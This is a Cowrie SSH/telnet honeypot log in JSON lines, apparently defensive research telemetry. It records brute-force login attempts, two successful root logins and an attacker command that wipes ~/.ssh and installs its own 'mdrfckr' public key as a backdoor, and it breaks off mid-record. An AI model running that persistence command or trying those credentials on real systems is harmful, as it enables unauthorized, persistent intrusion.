{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:27.704486Z","src_ip":"212.227.235.229","session":"6f29b40b77bc"}
{"eventid":"cowrie.session.closed","duration":13.112855672836304,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:30.040463Z","src_ip":"202.107.95.221","session":"81dfd5d0aec7"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":39756,"dst_ip":"1.2.3.4","dst_port":23,"session":"f49ca51dfb4b","protocol":"telnet","message":"New connection: 202.107.95.221:39756 (1.2.3.4:23) [session: f49ca51dfb4b]","sensor":"my-vps","timestamp":"2025-09-08T22:18:30.191401Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46292,"dst_ip":"1.2.3.4","dst_port":22,"session":"4436ada02599","protocol":"ssh","message":"New connection: 212.227.235.229:46292 (1.2.3.4:22) [session: 4436ada02599]","sensor":"my-vps","timestamp":"2025-09-08T22:18:30.524997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:30.525628Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:30.701163Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.session.closed","duration":12.775995969772339,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:30.818149Z","src_ip":"202.107.95.221","session":"06b365cb8ecc"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":39767,"dst_ip":"1.2.3.4","dst_port":23,"session":"21489cf51c34","protocol":"telnet","message":"New connection: 202.107.95.221:39767 (1.2.3.4:23) [session: 21489cf51c34]","sensor":"my-vps","timestamp":"2025-09-08T22:18:30.962829Z"}
{"eventid":"cowrie.login.success","username":"root","password":"passwort1@","message":"login attempt [root/passwort1@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:18:31.446813Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:18:31.843969Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:18:31.844621Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:18:31.845835Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:32.022302Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:18:32.429297Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:18:32.430013Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:18:32.607610Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:32.608569Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46294,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cb0050f9f55","protocol":"ssh","message":"New connection: 212.227.235.229:46294 (1.2.3.4:22) [session: 6cb0050f9f55]","sensor":"my-vps","timestamp":"2025-09-08T22:18:32.790692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:32.791488Z","src_ip":"212.227.235.229","session":"6cb0050f9f55"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:32.969974Z","src_ip":"212.227.235.229","session":"6cb0050f9f55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52682,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b06b4fb139a","protocol":"ssh","message":"New connection: 212.227.235.229:52682 (1.2.3.4:22) [session: 5b06b4fb139a]","sensor":"my-vps","timestamp":"2025-09-08T22:18:33.286462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:33.287370Z","src_ip":"212.227.235.229","session":"5b06b4fb139a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:33.536254Z","src_ip":"212.227.235.229","session":"5b06b4fb139a"}
{"eventid":"cowrie.session.closed","duration":12.586777925491333,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:33.544317Z","src_ip":"202.107.95.221","session":"7c1cd8b8f67f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:18:33.725713Z","src_ip":"212.227.235.229","session":"6cb0050f9f55"}
{"eventid":"cowrie.login.failed","username":"db2fenc","password":"Welcome1","message":"login attempt [db2fenc/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:18:34.574830Z","src_ip":"212.227.235.229","session":"5b06b4fb139a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:34.905405Z","src_ip":"212.227.235.229","session":"6cb0050f9f55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55286,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd1a864f6a16","protocol":"ssh","message":"New connection: 212.227.235.229:55286 (1.2.3.4:22) [session: fd1a864f6a16]","sensor":"my-vps","timestamp":"2025-09-08T22:18:35.080722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:35.081737Z","src_ip":"212.227.235.229","session":"fd1a864f6a16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:35.257145Z","src_ip":"212.227.235.229","session":"fd1a864f6a16"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:35.826770Z","src_ip":"212.227.235.229","session":"5b06b4fb139a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:18:36.000354Z","src_ip":"212.227.235.229","session":"fd1a864f6a16"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:36.171057Z","src_ip":"212.227.235.229","session":"4436ada02599"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:36.176792Z","src_ip":"212.227.235.229","session":"fd1a864f6a16"}
{"eventid":"cowrie.session.closed","duration":12.73465085029602,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:42.925987Z","src_ip":"202.107.95.221","session":"f49ca51dfb4b"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":40048,"dst_ip":"1.2.3.4","dst_port":23,"session":"72e63f088707","protocol":"telnet","message":"New connection: 202.107.95.221:40048 (1.2.3.4:23) [session: 72e63f088707]","sensor":"my-vps","timestamp":"2025-09-08T22:18:43.241165Z"}
{"eventid":"cowrie.session.closed","duration":12.991795301437378,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:43.954560Z","src_ip":"202.107.95.221","session":"21489cf51c34"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":40091,"dst_ip":"1.2.3.4","dst_port":23,"session":"f8be94de106b","protocol":"telnet","message":"New connection: 202.107.95.221:40091 (1.2.3.4:23) [session: f8be94de106b]","sensor":"my-vps","timestamp":"2025-09-08T22:18:44.092822Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55560,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f0e124aca3a","protocol":"ssh","message":"New connection: 212.227.235.229:55560 (1.2.3.4:22) [session: 2f0e124aca3a]","sensor":"my-vps","timestamp":"2025-09-08T22:18:54.110270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:54.111015Z","src_ip":"212.227.235.229","session":"2f0e124aca3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:54.408513Z","src_ip":"212.227.235.229","session":"2f0e124aca3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41444,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ff8c7a6ca0f","protocol":"ssh","message":"New connection: 212.227.235.229:41444 (1.2.3.4:22) [session: 1ff8c7a6ca0f]","sensor":"my-vps","timestamp":"2025-09-08T22:18:54.925437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:18:54.926364Z","src_ip":"212.227.235.229","session":"1ff8c7a6ca0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:18:55.260698Z","src_ip":"212.227.235.229","session":"1ff8c7a6ca0f"}
{"eventid":"cowrie.login.failed","username":"access","password":"password123","message":"login attempt [access/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:18:55.636310Z","src_ip":"212.227.235.229","session":"2f0e124aca3a"}
{"eventid":"cowrie.session.closed","duration":12.827122449874878,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:56.068212Z","src_ip":"202.107.95.221","session":"72e63f088707"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":40299,"dst_ip":"1.2.3.4","dst_port":23,"session":"c155d88a202b","protocol":"telnet","message":"New connection: 202.107.95.221:40299 (1.2.3.4:23) [session: c155d88a202b]","sensor":"my-vps","timestamp":"2025-09-08T22:18:56.205823Z"}
{"eventid":"cowrie.session.closed","duration":12.454707622528076,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:56.547449Z","src_ip":"202.107.95.221","session":"f8be94de106b"}
{"eventid":"cowrie.login.failed","username":"andreas","password":"andreas","message":"login attempt [andreas/andreas] failed","sensor":"my-vps","timestamp":"2025-09-08T22:18:56.631711Z","src_ip":"212.227.235.229","session":"1ff8c7a6ca0f"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:56.933135Z","src_ip":"212.227.235.229","session":"2f0e124aca3a"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:18:57.967484Z","src_ip":"212.227.235.229","session":"1ff8c7a6ca0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56890,"dst_ip":"1.2.3.4","dst_port":22,"session":"beb23c2faa63","protocol":"ssh","message":"New connection: 212.227.125.160:56890 (1.2.3.4:22) [session: beb23c2faa63]","sensor":"my-vps","timestamp":"2025-09-08T22:19:04.144174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T22:19:04.145161Z","src_ip":"212.227.125.160","session":"beb23c2faa63"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T22:19:04.239643Z","src_ip":"212.227.125.160","session":"beb23c2faa63"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:04.676710Z","src_ip":"212.227.125.160","session":"beb23c2faa63"}
{"eventid":"cowrie.session.closed","duration":13.590950727462769,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:09.796705Z","src_ip":"202.107.95.221","session":"c155d88a202b"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":40522,"dst_ip":"1.2.3.4","dst_port":23,"session":"1e57a64c3a0e","protocol":"telnet","message":"New connection: 202.107.95.221:40522 (1.2.3.4:23) [session: 1e57a64c3a0e]","sensor":"my-vps","timestamp":"2025-09-08T22:19:10.074455Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55352,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ea2783d0c8e","protocol":"ssh","message":"New connection: 212.227.235.229:55352 (1.2.3.4:22) [session: 9ea2783d0c8e]","sensor":"my-vps","timestamp":"2025-09-08T22:19:12.007885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:12.008953Z","src_ip":"212.227.235.229","session":"9ea2783d0c8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm